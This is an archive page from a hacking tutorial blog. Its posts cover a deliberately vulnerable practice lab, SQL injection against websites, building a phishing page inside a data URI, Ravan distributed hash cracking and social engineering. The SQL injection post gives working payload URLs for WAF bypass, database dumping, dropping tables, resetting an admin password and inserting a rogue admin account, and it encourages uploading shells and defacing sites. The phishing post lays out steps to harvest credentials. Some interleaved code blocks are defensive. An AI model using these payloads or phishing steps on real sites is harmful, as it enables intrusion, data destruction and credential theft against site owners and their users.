Showing posts with label Hacking Tutorials.

Tuesday, December 17, 2013

BTS PenTesting Lab - a vulnerable web application to learn common vulnerabilities


The most common question from students who are learning website hacking techniques is "how do I test my skills legally without getting into trouble?". Here is the solution for you: you can learn web application pentesting with our new app "BTS PenTesting Lab".


BTS PenTesting Lab is a deliberately vulnerable web application that lets you practise vulnerability techniques from basic to advanced.

Currently, the app contains the following vulnerability types:

  • SQL Injection
  • Cross Site Scripting (XSS)
  • Cross Site Request Forgery (CSRF)
  • Clickjacking
  • Server Side Request Forgery (SSRF)
  • File Inclusion (RFI and LFI)
  • Remote Code Execution

Download the latest version of BTS Lab:
https://sourceforge.net/projects/btslab/files/latest/download


How to run BTS PenTesting Lab?
1. Install XAMPP or WAMP on your machine.
2. Extract the zip file into the htdocs folder (make sure to rename the folder to "btslab").
3. Open the "http://localhost/btslab/setup.php" URL in your browser.
4. Click Setup.

That's all. Now you can start using the app at "http://localhost/btslab" :)

In the next update I will add more vulnerability types and advanced techniques. My next articles will be based on this app :)

Saturday, February 23, 2013

SQL Injection Tutorial: All common SQL injection problems and Solutions



Hello readers of BTS,
    Today I'll write a tutorial for you that covers most of the problems you'll run into while doing SQL injection and the solutions to them. Probably every person who has looked at tutorials on hacking a website has noticed that there are too many SQL tutorials. Almost every forum has 10 tutorials and every blog 5 tutorials about SQL injection, but actually those tutorials are stolen from somewhere else and the author probably doesn't even know why SQL injection works. All of those tutorials are like textbooks with their ABCs and the result is just a mess. Everyone is writing tutorials about SQL, but nobody covers the problems that come with that attack.

What is the cause of most problems related to SQL injection?

Web developers aren't always really dumb; they have also heard of hackers and have implemented some security measures like a WAF or manual protection. A WAF is a web application firewall and will block all malicious requests, but WAFs are quite easy to bypass. Nobody would like to have their site hacked, so they also implement some security, but of course it would be false to say that if we fail then it's the server's fault. There's also a huge possibility that we're injecting differently than we should.

A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

If you're interested in WAFs and how they work, I suggest reading about them on Wikipedia: http://en.wikipedia.org/wiki/Application_firewall


Order by is being blocked?


It rarely happens, but sometimes you can't use order by because the WAF has blocked it, or for some other reason. Unfortunately we can't skip the order by step and we have to find another way. The way is simple: instead of using order by we have to use group by, because that's very unlikely to be blacklisted by the WAF.

If this request returns 'forbidden' then it means it's blocked:
http://site.com/gallery?id=1 order by 100--
Then you have to try group by instead and it will return correctly:
http://site.com/gallery?id=1 group by 100-- / success
There's still a possibility that the WAF will block the request, but there's another way as well, and it's not very widely known. It's about using ( the main query ) = (select 1)
http://example.org/news.php?id=8 and (select * from admins)=(select 1)
Then you'll probably receive an error like this : Operand should contain 5 column(s).

That error means there are 5 columns, and it means we can proceed to our next step, which is union select. The command was different than usual, but the further injection will be the same.
http://site.com/news.php?id=-8 union select 1,2,3,4,5--

'order by 10000' and still no error?

That's a small chapter where I'll tell you why sometimes order by won't work and you don't see an error. The difference between this chapter and the last one is that previously your requests were blocked by the WAF, but here the injection method is just a little bit different. When I saw that for the first time I thought: how does a database have 100000 columns, because I'm not getting the error while the site is vulnerable?

The answer is quite logical. By trying order by 1000000 we're not getting the error, and it's not because there are so many columns in there; we're not getting the error because our injection isn't working.

Example : site.com/news.php?id=9 order by 10000000000-- [No Error]
To bypass this you just have to change the URL a little bit. Add ' after the ID number and at the end just enter +

Example :
site.com/news.php?id=9' order by 10000000--+ [Error]
If the last example is working for you then it means you have to use it in the next steps also. There isn't anything complicated, but to make everything clear I'll still give an example.

http://site.com/news.php?id=-9' union select 1,2,3,4,5,6,7,8--+

Extracting data from other databases.

Sometimes we can inject successfully and no error appears; it's just like a hacker's dream. That dream will end at the moment when we see that there doesn't exist anything useful to us. There are only a few tables and they are called "News", "gallery" and "articles". They aren't useful at all to us because we'd like to see tables like "Admin" or "Administrator". Still, we know that the server probably has several databases, and even if we have found the information we're looking for, you should still take a look in the other databases also.

This will give you the schema names.
site.com/news.php?id=9 union select 1,2,group_concat(schema_name),4 from information_schema.schemata

And with this code you can get the tables from the schema.
site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x

This code will give you the column names.
site.com/news.php?id=9 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=0x and table_name=0x

I get an error if I try to extract tables.

site.com/news.php?id=9 union select 1,2,group_concat(table_name),4 from information_schema.tables

Le wild Error appears.
"you have an error in your sql syntax near '' at line 1"
Change the URL to this:
site.com/news.php?id=9 union select 1,2,concat(unhex(hex(table_name))),4 from information_schema.tables limit 0,1--


How to bypass WAF/Web application firewall

The biggest reason why most of these errors appear is the security measures added to the server, and a WAF is the biggest reason, but mostly they're made really badly and can be bypassed really easily. Mostly you will get a 404 error like in the code below; this is the WAF. Most likely people who're into SQL injection and bypassing WAFs are thinking at the moment "Dude, only one bypassing method?", but in this case we both know that bypassing WAFs is a different kind of science and I could write an ebook on bypassing these. I'll keep all those bypassing queries for another time and won't cover them this time.

"404 forbidden you do not have permission to access to this webpage"

The code will look like this if you get the error
http://www.site.com/index.php?id=-1+union+select+1,2,3,4,5--
[Error]

Change the URL like below.
http://www.site.com/index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5--
[No error]
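Seen from the defender's side, the bypass above only works if the WAF matches on the raw request. The following added example (not from the tutorial and not any WAF product's code) normalises a query string the way MySQL would read it, expanding URL encoding and keeping the body of `/*! ... */` version comments before matching, so both request forms above are caught; the request lines are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Constructed request lines modelled on the two URLs in the text, plus benign ones.
SAMPLE_REQUESTS = [
    "GET /index.php?id=-1+union+select+1,2,3,4,5-- HTTP/1.1",
    "GET /index.php?id=-1+/*!UnIoN*/+/*!sELeCt*/1,2,3,4,5-- HTTP/1.1",
    "GET /index.php?id=42 HTTP/1.1",
    "GET /news.php?id=9%20/*!50000uNiOn*/%0aSeLeCt%201,2 HTTP/1.1",
    "GET /search.php?q=reunion+selected+photos HTTP/1.1",
]

# MySQL executes the body of a /*!...*/ comment (optionally version-prefixed), so a
# normaliser must keep that body; an ordinary /*...*/ comment is just whitespace.
VERSION_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b")


def normalize_query(raw):
    """Reduce a raw query string to the form the database parser would see."""
    s = unquote_plus(raw)                # '+' and %XX escapes become real characters
    s = VERSION_COMMENT.sub(r" \1 ", s)  # /*!UnIoN*/ -> UnIoN
    s = PLAIN_COMMENT.sub(" ", s)        # /* anything */ -> a single space
    s = re.sub(r"\s+", " ", s)           # collapse tabs, newlines and runs of spaces
    return s.strip().lower()


def query_string(request_line):
    """Return the query part of 'METHOD /path?query HTTP/x.y'."""
    target = request_line.split(" ")[1]
    return target.partition("?")[2]


def detect_union_select(request_line):
    """True when the normalised query contains a UNION ... SELECT clause."""
    return UNION_SELECT.search(normalize_query(query_string(request_line))) is not None


def scan(requests=SAMPLE_REQUESTS):
    """Map each request line to its verdict."""
    return {r: detect_union_select(r) for r in requests}


if __name__ == "__main__":
    for line, hit in scan().items():
        print("ALERT" if hit else "ok   ", line)
```

Real WAF engines apply many more transformations than this; the point is that matching happens after canonicalisation, not on the bytes as sent.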

Is it possible to modify the information in the database by SQL injection?

Most people aren't aware of it, but it's possible. You're able to UPDATE, DROP, INSERT and SELECT information. Most people who deal with SQL injection have never looked deeper into the attack than shown in the average SQL injection tutorial, but the average SQL injection tutorial doesn't have those statements added, most likely because most people are copy-pasting tutorials or just rewriting them. You might ask why one should update, drop or insert information into the database if I can just look at the information and use the current one; why should we make another Administrator account if one already exists?

Reading the information is just one part of the injection, and sometimes those other commands, which are quite infamous, are more powerful than we thought. If you have read all those available SQL injection tutorials then you're probably aware that you can read the information, but you didn't know you're able to modify it. If you have tried SQL injecting then you have probably faced the problem that there isn't an administrator account; why not use the INSERT command to add one? There isn't an admin page to log in to; why not drop the table and all the information so nobody could access it? I want to get rid of the current Administrator and can't change his password; why not use the UPDATE command to change the password of the Administrator?

You have probably noticed that I have talked a lot about unnecessary information that you probably don't need to know, but that's information you need to learn and understand to become a real hacker, because you have to learn how SQL databases work to figure out how those commands work, and you can't find tutorials about it on the network. It's just like the math you learn in school: if you don't learn it then you'll be in trouble when you grow up.

Theory is almost over and now let's get to the practice.

Let's say that we're visiting this page and it's vulnerable to SQL injection.

http://site.com/news.php?id=1


You have to start injecting to look at the tables and the columns in them, but let's assume that the current table is named "News".
With SQL injection you can SELECT, DROP, UPDATE and INSERT information in the database. The SELECT is probably already covered in all the tutorials, so let's focus on the other three. Let's start with the DROP command.

I'd like to get rid of a table, how to do it?

http://site.com/news.php?id=1; DROP TABLE news

That seems easy; we have just dropped the table. I'd explain what we did in the above statement, but it's quite hard to explain because you can all understand the above command. Unfortunately most of the 'hackers' who make tutorials on SQL injection aren't aware of it, and sometimes those three words are more important than all the information we can read in some tutorials.

Let's head to the next statement, which is UPDATE.
http://site.com/news.php?id=1; UPDATE 'Table name' SET 'data you want to edit' = 'new data' WHERE column_name='information'--

The above explanation might be quite confusing, so I'll add a query that you're most likely going to use in real life :

http://site.com/news.php?id=1; UPDATE 'admin_login' SET 'password' = 'Crackhackforum' WHERE login_name='Rynaldo'--

We have just updated the Administrator account's password. In the above example we updated the column called 'admin_login' and added a password, which is "Crackhackforum", and those credentials belong to the account whose username is Rynaldo. Kinda heavy to explain, but I hope you'll understand.


How does INSERT work?


Luckily "INSERT" isn't as easy as the "DROP" statement, but it's still quite understandable. Let's go further with Administrator privileges because that's what most people are heading for. Adding an administrator account would be like this :
http://site.com/news.php?id=1; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (2,'Rynaldo','Crackhackforum','NA')--

INSERT INTO 'admin_login' means that we're inserting something into 'admin_login'. Now we have to give the database instructions about what exact information we want to add: ('login_id', 'login_name', 'password', 'details') means that the fields we're adding to the DB are login_id, login_name, password and details, and that's the information the database needs to create a new account. So far we have told the database what information we want to add: we want to add a new account, a password for it, an account ID and details. Now we have to tell the database what the new account's username, password and account ID will be: VALUES (2,'Rynaldo','Crackhackforum','NA')-- . That means the account ID is 2, the username will be Rynaldo and the password of the account will be Crackhackforum. Your new account has been added to the database and all you have to do is open up the Administrator page and log in.

Passwords aren't working

Sometimes the site is vulnerable to SQL injection and you can get the passwords. Then you find the site's username and password, but when you enter them into the admin panel it shows "Wrong password". This can be because those usernames and passwords are there but aren't working. This is done by the site's admin to confuse you, and actually the Cpanel doesn't contain any username/password. Sometimes accounts are removed, but the accounts are still in the database. Sometimes it isn't done by the admin and those credentials have been left in the database after removing the login page; sometimes the real credentials have been transferred to another database and the old entries haven't been deleted.

Sometimes i get some weird password

This weird password is called a hash, and most likely it's an MD5 hash. That means the site's admin has added more security to the website and has encrypted the passwords. The most popular crypting way is using an MD5 hash. The best way to crack MD5 hashes is using PasswordsPro or Hashcat, because they're the best and can crack the password even if it's really hard or isn't MD5. Also you can use http://md5decrypter.com . I don't like to be a person who's picking at small details that aren't correct, but here's a tip you should keep in mind. The domain says "md5decrypter", which refers to decrypting MD5 hashes. Actually it's not possible to decrypt a hash because they have 'one-way' encryption. One-way encryption means it can only be encrypted, but not decrypted. Still, it doesn't mean that we can't know what the hash means; we have to crack it. Hashes can't be decrypted, only cracked. Those online sites aren't cracking hashes every time; they save already cracked hashes and results in their database, and if you ask for a hash that's already in their database, you will get the result. :)

An MD5 hash looks like this : 827ccb0eea8a706c4c34a16891f84e7b = 12345
You can read about all the hashes that exist and their descriptions at http://pastebin.com/aiyxhQsf
Md5 hashes can't be decrypted, only cracked
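Added here as an illustration of the point just made (it is not part of the article): an unsalted MD5 hash is answered by consulting a precomputed table of candidate passwords, not by reversing anything, while a per-user random salt and a slow key-derivation function (PBKDF2-HMAC-SHA256 from Python's hashlib, used here as the defender's alternative) deny that shortcut. The candidate password list is a constructed sample.

```python
import hashlib
import hmac
import os

# Constructed sample of weak passwords; "12345" is the clear text behind the hash quoted above.
COMMON_PASSWORDS = ["password", "12345", "123456", "qwerty", "letmein", "admin"]

PBKDF2_ROUNDS = 100_000  # deliberately slow: every guess costs this many HMAC computations


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def build_lookup(candidates):
    """The precomputed hash -> clear-text table an online 'decrypter' actually consults."""
    return {md5_hex(p): p for p in candidates}


def lookup_md5(hash_hex, table):
    """Return the clear text if this hash was precomputed, None otherwise.

    Nothing is reversed: an unknown hash simply misses the table."""
    return table.get(hash_hex.strip().lower())


def store_password(password):
    """Defender's side: a random 16-byte salt per user plus PBKDF2-HMAC-SHA256."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


def verify_password(password, salt, digest):
    """Recompute with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


def shared_table_defeated(password):
    """Two users with the same password get different digests, so one table cannot serve both."""
    _, d1 = store_password(password)
    _, d2 = store_password(password)
    return d1 != d2


if __name__ == "__main__":
    table = build_lookup(COMMON_PASSWORDS)
    print(lookup_md5("827ccb0eea8a706c4c34a16891f84e7b", table))  # found: 12345
    salt, digest = store_password("12345")
    print(verify_password("12345", salt, digest), shared_table_defeated("12345"))
```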

How to find admin page of site?


Some sites don't contain an admin control panel, and that means you can use any method for finding the admin page, but it doesn't even exist. You might ask "I got the username and password from the database, why isn't there any admin login page then?", but sometimes they are just left in the database after removing the Cpanel.

Mostly people are using tools called "Admin page finders". They have a specific list of pages and will try them. If the page gives HTTP response 200 then it means the page exists, but if the server responds with HTTP response 404 then it means the page doesn't exist there. If a page from the list exists then the tool will say "Page found". I don't have any tool to share at the moment, but if you're downloading one yourself then beware, because most of those tools are infected with viruses.

The tools I mentioned above, admin page finders, usually don't find the administrator page if it's custom made or renamed. That means quite often those tools don't help us out and we have to use an alternative, and I think the best one is using site crawlers. Most of you probably have Acunetix Web Vulnerability Scanner 8 and it has one wonderful feature called site crawler. It'll show you all the pages on the site and will 100% find the login page if one exists on the site.


Automated SQL injection tools.

Automated SQL injection tools are programs that will do the whole work for you; sometimes they will even crack the hashes and find the Administrator page for you. Most people are using automated SQL injection tools, and the most popular of them are Havij and SQLmap. Havij is used much more than SQLmap, no matter that the other tool is much better for that injection. The sad truth why that's so is that many people aren't even able to run SQLmap, and those persons are called script-kiddies. Being a script-kiddie is the worst thing you can be in the hacking world, and if you don't learn how to perform the attack manually and are only using tools then you're one of them. If you're using those tools to perform the attack then most people will think that you're a script-kiddie, because most likely you are. Professionals won't take you seriously if you're injecting with them and you won't become a real hacker either. My above text might give you a question, "But I've seen that even professional hackers are using SQLmap?", and I'd like to say that everything isn't always black and white. If there are 10 databases, 50 tables in them and 100 columns in each table then it would just take days to process all that information. I'm also sometimes using automated tools because it makes my life easier, but to use those tools you first have to learn how to do it manually, and that's what the tutorial above is teaching you.

Use automated tools only to make your life easier, but don't even look at them if you don't know how to perform the attack manually.

What else can I do with SQL injection besides extracting information?

There are many things besides extracting information from the database, and sometimes they are much more powerful. We have said above that sometimes the database doesn't contain the Administrator's credentials or you can't crack the hashes. Then all the injection seems pointless because we can't use the information we have got from the database. Still, we can use a few other methods. Just like we can conduct a CSRF attack with persistent XSS, we can also move to other attacks through SQL injection. One of the solutions would be performing a DOS attack on the website which is vulnerable to SQL injection. DOS is short for Denial of Service and it's totally different from DDOS, which is Distributed Denial of Service. I think that you all probably know what these are, but if I sum that attack up in a sentence, DOS will allow us to take down the website temporarily so users wouldn't have access to the site. The other way would be uploading our shell through SQL injection. If you're wondering what a shell is, then to put it shortly, it's a script that we upload to the server; it will create a backdoor for us and will give us all the privileges to do what we'd like on the server, and sometimes by uploading a shell you have more rights to modify things than the real Administrator has. After you have uploaded a shell you can move forward to symlink, which means we can deface all the sites that share the same server. Shelling the website is probably the most powerful thing you can use on the website. I have not covered how to upload a shell through SQL injection and haven't covered how to cause DOS either, but probably will do in my next tutorials, because uploading a shell through SQL is another kind of science, just like bypassing WAFs. Those are the most common methods that attackers put to use after they can't get anything useful out of the database.
Of course every website doesn't have the same vulnerabilities and they don't always respond like we want, and by that I mean we can't perform those attacks on all websites. We have all heard that imagination is unlimited and you can do whatever you'd like. That's kinda true and hacking isn't an exception; there are more ways than I can count.

What to do if all the information doesn't display on the page?
I have actually really rarely seen that there is so much information on the web page that it all just doesn't fit in there, but one person recently asked me that question and I decided to add it here. Also, if you have questions then surely ask and I'll update the article. If we get back to the question, the answer is simple: if all the information can't fit on the screen then you have to look at the source code, because everything displayed on the web page will be in there. Also, sometimes information will appear in the tab where the site's name usually is. If you can't see the information then sometimes it's hidden, but by taking a deeper look you might find it in the source. That's why you always have to look at all the solutions before quitting, because sometimes you might think "I can't inject into that..", but actually the answer is hidden in the source.


What is the purpose of '--' in the union+select+1,2,3,4,5-- ?
I suggest reading about null bytes, and here's a good explanation of them : http://en.wikipedia.org/wiki/Null_character because it might give you some hint why -- is being used. Adding -- at the end of the URL isn't always necessary and it depends on the target. It doesn't have any influence on the injection because it doesn't mean anything, but it's still being used because it marks the end of the query. It means if I'm injecting as : http://site.com/news.php?id=-1 union select 1,2,3,4,5-- asasdasd then the server will skip everything after -- and asasdasd won't be read. It's just like masking a shell. Sometimes the injection isn't working if -- is missing, because -- tells the DB "I'm the end of the query, don't read anything that comes after me and execute everything in front of me". It's just like writing a sentence without a full stop: people might think it's not the end of your sentence and will wait until you write the other part of the sentence, and the end will come when you add the full stop to your sentence.
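To show why the queries in this article work on some pages and what stops them, here is an added example (not from the article) using Python's sqlite3 on a constructed in-memory database with hypothetical news and admin_login tables: the first function builds the statement by string concatenation, as the vulnerable pages in the text do, so the union select and the trailing -- become part of the SQL; the second binds the id as a parameter, so the same input is only ever compared as a value.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the tutorial's "news" and "admin_login" tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT);
        INSERT INTO news VALUES (1, 'Welcome'), (2, 'Release notes');
        CREATE TABLE admin_login (login_name TEXT, password TEXT);
        INSERT INTO admin_login VALUES ('admin', 'not-a-real-secret');
    """)
    return db


def news_title_vulnerable(db, id_param):
    """Pattern behind news.php?id=...: the parameter is pasted into the SQL text.

    A value such as "-1 union select password from admin_login--" rewrites the
    statement, and the trailing "--" comments out whatever the page appends."""
    sql = "SELECT title FROM news WHERE id = " + id_param
    return [row[0] for row in db.execute(sql)]


def news_title_safe(db, id_param):
    """Same lookup with a bound parameter: the value is data, never SQL."""
    rows = db.execute("SELECT title FROM news WHERE id = ?", (id_param,))
    return [row[0] for row in rows]


def db_error(db, id_param):
    """Return the database error text the vulnerable page would leak, or None.

    The 'order by 100' probe in the text relies on exactly this kind of verbose
    error reaching the browser; a hardened page logs it and shows a generic message."""
    try:
        news_title_vulnerable(db, id_param)
    except sqlite3.Error as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    db = make_db()
    probe = "-1 union select password from admin_login--"
    print(news_title_vulnerable(db, probe))   # leaks the admin password
    print(news_title_safe(db, probe))         # [] : no row has that literal id
    print(db_error(db, "1 order by 100--"))   # ORDER BY term out of range
```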


Credits:
Every sentence of this article is written by Crackhackforum.com staff Rynaldo.
BTS & BTS readers are really thankful to Rynaldo for submitting such a wonderful article to Break The Security.

Tuesday, September 4, 2012

How to create Phishing site without Webhost using Data URI?


Hello BTS readers, it has been a long time since I posted an article on this blog. Today I came across an interesting news update that describes a new technique used in phishing attacks.

Phishing is one of the most popular social engineering attacks used by cybercriminals. In this method, attackers host a fake web page that looks similar to the original page of the website.

Then the attackers lure users to the phishing page with legitimate-looking mails. When a user enters login data on the phishing page, the information is stored in the attackers' database. At the end, the user is redirected to the original website so that they won't realize they are under attack.

From the above, it is clear that cybercriminals need web hosting for their phishing page. But recent research shows that a hosting site is no longer needed for hosting the phishing page (although you still need web hosting to run the script that stores the data).

Henning Klevjer, an information security student at the University of Oslo in Norway, shows how an attacker can create a phishing page using a Data URI.

What is a Data URI?
Data URLs are a Uniform Resource Identifier scheme that allows you to include data items inline in a web page as if they were being referenced as external resources. Data URLs are a form of Uniform Resource Locator, although they do not in fact remotely locate anything. Instead, the resource data is contained within the URL string itself. This saves the browser from having to make additional HTTP requests for the external resources, and can thus increase page loading speed.

For example:
<img src='' alt='BTS_Image'/>
The above tag, with the image data placed in its src attribute, displays the image in the page.
The fun part of the Data URI is that you can directly enter the code in the browser address bar and load the content.

For example, pasting such a data URL into the browser address bar will load the image directly.

Not only images: you can load text, HTML and other supported formats. You got my point?! Yes, cybercriminals are able to load an entire phishing page using the data URI method.

A simplified Data URI example (without base64 encoding):
data:text/html, <h1>BreakTheSecurity</h1>
Entering the above data URL in the browser address bar will display the "BreakTheSecurity" text in h1 format.

Data URIs follow this scheme:

data:[<mediatype>][;base64],<data>
Here, <mediatype> is one of the MIME media types described in RFC 2046. Base64 encoding is optional.
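As an added example (not from the post), the parser below takes a data URL apart according to the scheme above, decodes the base64 or percent-encoded payload, and flags inline HTML or script, the form this phishing technique relies on; it is the check a mail gateway or link scanner would apply before letting such a link through. Both sample URLs are constructed, one of them being the post's own unencoded example.

```python
import base64
from urllib.parse import unquote

# Media types that render as a document or run code when opened from the address bar.
# (image/svg+xml is included because SVG may carry script; the others are obvious.)
ACTIVE_TYPES = {"text/html", "application/xhtml+xml", "text/javascript", "image/svg+xml"}

# Constructed samples: the post's unencoded example and a base64 form of the same document
# (the encoded payload is PGgxPkJyZWFrVGhlU2VjdXJpdHk8L2gxPg==).
SAMPLE_PLAIN = "data:text/html, <h1>BreakTheSecurity</h1>"
SAMPLE_BASE64 = "data:text/html;base64," + base64.b64encode(b"<h1>BreakTheSecurity</h1>").decode("ascii")


def parse_data_url(url):
    """Split data:[<mediatype>][;base64],<data> into mediatype, base64 flag and decoded bytes."""
    scheme, sep, rest = url.strip().partition(":")
    if not sep or scheme.lower() != "data":
        raise ValueError("not a data URL")
    header, sep, payload = rest.partition(",")
    if not sep:
        raise ValueError("data URL has no ',' between header and data")
    params = [p.strip() for p in header.split(";")]
    mediatype = params[0].lower() or "text/plain"   # RFC 2397 default when omitted
    is_base64 = any(p.lower() == "base64" for p in params[1:])
    if is_base64:
        data = base64.b64decode("".join(payload.split()))  # tolerate wrapped lines
    else:
        data = unquote(payload).encode("utf-8")            # percent-encoded text
    return {"mediatype": mediatype, "base64": is_base64, "data": data}


def is_inline_document(url):
    """True when a data URL carries HTML or script rather than an image or plain text."""
    try:
        info = parse_data_url(url)
    except ValueError:
        return False
    return info["mediatype"] in ACTIVE_TYPES


if __name__ == "__main__":
    for u in (SAMPLE_PLAIN, SAMPLE_BASE64, "data:image/png;base64,iVBORw0KGgo="):
        info = parse_data_url(u)
        print(info["mediatype"], info["base64"], is_inline_document(u), info["data"][:32])
```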

How can an attacker use it for creating a phishing page?
This section is not suitable for someone who doesn't know how to create a normal phishing page. Read this post before reading this section.

Step 1:
Copy the source code from the original site (right click and select 'view page source').
Step 2:
Modify the code so that it transfers the user's credentials to another location.
Step 3:
Now encode the source code with base64.
Step 4:
Once you have the encoded code, create the data URI by following the above scheme.
For example:
data:text/html;base64, encoded_code_goes_here
Alternatively you can use this site for creating the data URI:
http://software.hixie.ch/utilities/cgi/data/data

As the data URL is too long, attackers use a URL shortening service. But Google Chrome shows a warning whenever a URL shortening service redirects to a data URL.


Sunday, April 22, 2012

How to Use Ravan for Password Cracking?


In my previous article I explained the Ravan tool. Now let us see how to use Ravan for cracking passwords.


Requirements:
Lots of friends :
Ravan is a distributed password cracking method, so you will need a lot of friends who have a PC with an Internet connection. The cracking speed increases with the number of PCs contributing to the cracking.

How to use Ravan?

Step 1:
  • Go to http://www.andlabs.org/tools/ravan.html
  • Enter the value of the hash that must be cracked
  • Enter the value of the salt; if it is not a salted hash then leave it blank
  • Enter the charset. Only these characters will be used in the brute force attack
  • Select the hashing algorithm (MD5, SHA1, SHA256, SHA512)
  • Select the position of the salt (clear-text+salt or salt+clear-text)
  • Hit ‘Submit Hash’
Step 2:
If the hash is successfully submitted, it returns a URL. Now you just need to send this URL to all your friends and ask them to click the Start button.

The main page manages the cracking, so it must not be closed or the cracking would fail.

That is it. Once your friends click Start they will be doing pieces of the work and submitting results back.


The main page constantly monitors the progress of the cracking process and manages it across all the workers. You can see the stats throughout the process; once the hash is cracked the clear-text value is displayed.

Ravan , JavaScript based Distributed Password cracking



You want to crack a hash but your system is slow?! No need to worry! Here is a solution for you: "Distributed Password Cracking". Let me introduce a new tool called "Ravan", developed by Lavakumar.
About Ravan:
Ravan is a JavaScript based distributed computing system that can perform brute force attacks on salted hashes by distributing the task across several browsers. It makes use of HTML5 Web Workers to start background JavaScript threads in the browsers of the workers; each worker computes a part of the hash cracking activity.
Ravan currently supports MD5, SHA1, SHA256 and SHA512 hashes.

How does it work?
Ravan has three components:

Master:
The hash, salt, hashing algorithm, position of the salt (before or after the clear text) and the charset are submitted by the user. These are submitted to the web backend and it returns a 'hash id' which is unique to every submitted hash. It also supplies a 'worker url' specific to this hash that must be sent to potential workers.
Once the hash is submitted the master creates arrays of slots (each array contains 5 slots), and this is submitted to the web backend. Each slot represents a small part of the keyspace; this is how the entire activity is broken down into multiple tiny tasks. A single slot represents 1 million combinations.
The master constantly polls the web backend to check on the progress of the cracking process. As the existing list of slots is completed by the workers the master allots more slots. When a worker cracks the hash and returns the clear-text value, the master confirms this and then signals all workers to stop cracking.

Web Backend:
The web backend acts as a proxy between the master and the workers. It does not perform any actual computation but validates the data submitted by both the parties and passes information between them.

Worker:
The worker performs the actual hard work of cracking the hashes. Each hash has a unique worker URL, and this page explicitly asks for the user's permission before the cracking process is started. Once the user accepts and clicks 'Start', the worker polls the web backend for available slots and the web backend returns an array of slots from its database. The worker cracks each slot and sends the result to the web backend. After completing all the slots it polls the web backend for more slots.

Here is the tool:
http://www.andlabs.org/tools/ravan.html

Tutorial: How to use Ravan Tool?

Wednesday, April 4, 2012

The Art of Human Hacking -Social Engineering(SE) tutorial series



Hello BTS readers, here we come with an interesting tutorial written by my friend Mr. Ashish Mistry, who is the founder of Hcon and author of the 'HconSTF' project.


Hello all,

After a long time I have started writing again, in the hope that my belief in "sharing the spirit of learning" is fulfilled well. So from today I am going to write a series of tutorials on my favorite topic, 'Social Engineering' (SE).

Starting from a small intro to the very basics of what SE is, why you should learn and use it and how it works, and as we go further in this series we will look at 'leveraging SE in penetration testing'.

Disclaimer: The examples used in this tutorial series are some of my own and some randomly picked from the internet and social networks, so if any example accidentally matches your situation, no one can hold me responsible for anything in any regard whatsoever. These are just examples for a totally educational purpose and I do not intend to offend anyone or anything.
These tutorials are for educational purposes only; only you as the reader are responsible for whatever you do with the material published here, not the author and not the site.

So let's begin with the first tutorial on SE.

what is social engineering???
It's the art of manipulating humans.
In simpler words: 'tricking people so they do what YOU want from them, or get it done by them'.

got confused??

Let's take one example:
Suppose you go to a toy shop with your child, and your child wants a toy car, so he asks the salesperson to show a car, or one he may have seen on display. The salesperson shows that car, or always starts with a costly car, so when the boy sees the car he asks to take only that car, because the salesperson showed some features like lights and a remote and so on. But the toy car is too costly for this month's budget and the boy wants it anyhow, so you try to divert the child to some other car more within your budget; as he is a small child he does not listen to you, and at the end of all this,
either you buy the costly car the child wanted, or he doesn't get anything, or he gets some other car.

Now you might ask me, "So what's new in this? It's very normal, every child does it, right?" But the point of this example is to show a perfectly crafted and executed 'social engineering attack' in our day-to-day life.
In the above example the social engineer is the shop's salesperson, who used the child to sell an expensive car and get more money from you.

Basically the salesperson targeted the nature of the child, because he knows that once a child has been shown what he wants, it is very difficult for the parents to divert him, so the salesperson can sell what HE wants.

So in basic exploitation terms:
  • Attacker = the salesperson
  • Vulnerability (weakness) = the child (actually his obvious nature)
  • Exploit (trick) = showing the more expensive car and its features to capture the child's attention
  • Payload (purpose) = more money from you
  • Target = yes, you guessed it right, it's YOU :)


Let us take another example:

This one is simple but a real-world example from Facebook:
a person shared this image of a quote from the honourable Mr. APJ Abdul Kalam.

It's good, right? He is proud of him, or liked the quote, right?
But now let us try to understand it from the SE point of view.
There are some things to note in the photograph:
1. on the image, a website address is printed
2. below the image, the website address is written again

First let me tell you that the web address was not a government site but a private product-trading site, totally unrelated to the image; marking the image with it is quite a disrespect by that person. Anyway,
so why would anyone do this?

A very simple but clever kind of SE here:
  • Attacker = whoever originally edited the photo with the web address
  • Vulnerability (weakness) = the human habit of sharing and liking good photos/quotes
  • Exploit (trick) = the edited photo carrying the quote
  • Payload (purpose) = marketing his website and reaching more audience for his business, for FREE
  • Target = anyone on Facebook who shares this photo

Another noticeable point: if you see something your mind likes, it gets stored somewhere in your memory, so when anyone around you asks or talks about property or trading, your mind may flash back to this site.
Now, after this example, let us refine and add to our previous simple definition of SE.

"It is the art of manipulating people so that they do what you want or give you what you want, without any kind of physical force. It is a whole psychological process of targeting other people's minds to gain their TRUST and exploit it, using human weaknesses against the target by crafting SE attacks around the kind of work we want others to do for us."

Hopefully you now have an idea of social engineering (SE) and some things to start understanding and observing it. But yes, every human and their psychological behaviour is different; studying your target and crafting the attack according to your goal will give more success. For this, the key things are observation and the quick responses of the attacker or social engineer.

So who can be considered a social engineer?
It can be anyone, from a relative or friend convincing you to do or believe what they say even if you don't want to do it or believe it.

It can be a salesperson, a marketing person, a thief or con artist, your boss, penetration testers, forensics experts, or anyone around you!

